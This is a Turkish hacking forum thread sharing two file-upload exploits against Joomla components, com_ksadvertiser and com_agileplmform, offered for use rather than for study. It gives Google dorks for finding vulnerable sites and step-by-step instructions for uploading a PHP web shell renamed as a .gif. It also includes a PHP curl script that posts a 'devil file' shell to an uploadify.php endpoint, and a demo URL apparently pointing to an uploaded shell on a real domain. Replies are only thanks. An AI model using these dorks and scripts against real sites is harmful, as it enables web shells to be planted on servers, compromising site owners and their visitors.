Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
2012- 2013 Joomla Upload Açıkları
#1
2013 - 2012 'in En çok kullanılan Joomla Upload Açıkları

[color=#006400]Joomla Component com_ksadvertiser Remote File & Bypass Upload Vulnerability


Kod:
----------------------------------------------------
Google Dork: inurl:index.php?option=com_ksadvertiser
-----------------------------------------------------
1.  Some pages require the Register
Registrese Algunas Paginas lo exigen
-----------------------------------------------
http://site/index.php?option=com_user&view=login

-----------------------------------------------
2.  Go to the upload path
Dirijase a la ruta del upload

-----------------------------------------------------------------------------------
http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
------------------------------------------------------------------------------------
3.  Go to images and give click to upload, browse your file shell.php, and rename it to shell.php.gif
Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif

4.  Locate your file in the root / images/ksadvertiser/U0 -> this may vary
Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar
---------------------------------------------
http://site/images/ksadvertiser/U0/403.php.gif

----------------------------------------------
Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
------------------------------------------------------------------


Joomla Component com_agileplmform file upload vulnerability


Kod:
---------------------------------------------
Google Dork: inurl:components/com_agileplmform
----------------------------------------------
<?php
/* example of using
$uploadfile="C:\AppServ\www\Tunisia.php"; */
$uploadfile="C:\AppServ\www\b.php";
$ch = curl_init("http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_agileplmform/views/agileplmform/js/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

[+] how TO use
Tunisia.php must be the devil file 3:)
!!!shell!!!
--------------------------------------------------------------------------------
TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/
Filename : $postResult output
Beğenenler:
#2
teşekürler abim exciting
Beğenenler:
#3
Teşekkürler
Beğenenler:
#4
eline sağlık ;)
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#5
eline sağlık abim exciting
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Shell Upload Dorkları H4Sec 177 10,597 08-12-2016, Saat: 13:16
Son Yorum: Mr.Blade
  Joomla Sistemlere Shell Yükleme Resimli Kısa Anlatım KingSkrupellos 3 85 21-11-2016, Saat: 00:14
Son Yorum: zheeshorn
  Joomla WP BruteForce BatchGuru v1.0 Perl Stallk3r 16 532 05-09-2016, Saat: 00:44
Son Yorum: tartiks
  XSS Açıkları Hakkında Dark-Capar 3 98 14-08-2016, Saat: 22:42
Son Yorum: Dark-Capar
  Serverdeki joomla siteleri ayırma ve brute force archavin 40 3,240 27-07-2016, Saat: 14:53
Son Yorum: MuratAlpTR
Anahtar Kelimeler

2012- 2013 Joomla Upload Açıkları indir, 2012- 2013 Joomla Upload Açıkları Videosu, 2012- 2013 Joomla Upload Açıkları Online izle, 2012- 2013 Joomla Upload Açıkları Bedava indir, 2012- 2013 Joomla Upload Açıkları Yükle, 2012- 2013 Joomla Upload Açıkları Hakkında, 2012- 2013 Joomla Upload Açıkları Nedir, 2012- 2013 Joomla Upload Açıkları Free indir, 2012- 2013 Joomla Upload Açıkları Oyunu, 2012- 2013 Joomla Upload Açıkları Download


1 Ziyaretçi